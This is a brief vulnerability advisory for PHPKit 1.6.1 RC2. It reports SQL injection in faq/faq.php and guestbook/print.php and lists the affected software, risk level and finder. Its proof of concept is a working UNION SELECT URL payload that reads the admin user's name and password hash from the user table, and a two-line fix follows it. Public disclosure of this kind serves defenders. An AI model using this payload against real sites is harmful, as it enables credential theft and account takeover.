PHPKit 1.6.1 RC2 (faq/faq.php) Remote SQL Injection Exploit

±-------------------------------------------------------------------
+

• PHPKit 1.6.1 RC2
• Original advisory:
• http://www.bb-pcsecurity.de/

±-------------------------------------------------------------------
+

• Affected Software .: PHPKit 1.6.1 RC2
• Venedor …: http://www.phpkit.de/
• Class …: Remote SQL Injection
• Risk …: high
• Found by …: Philipp Niedziela
• Contact …: webmaster[at]bb-pcsecurity[.]de

±-------------------------------------------------------------------
+

• SQL-INJECTION IN SEVERAL FILES:
• guestbook/print.php
• faq/faq.php
• more (but untested!)

±-------------------------------------------------------------------
+

• POC:

±-------------------------------------------------------------------
+

• /include.php?path=faq/faq.php&catid=-1\'%20UNION%20SELECT%20
• 1,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20
• FROM%20phpkit_user%20where%20%20user_id=1%20and%20\'1\'=\'1
• Solution:
• -> Install Hack_Block (search google :))
• -> escape the variables in your SQL-Statement

±-------------------------------------------------------------------
+

• Greets and Thanks: /str0ke

±------------------------[ E O F ]----------------------------------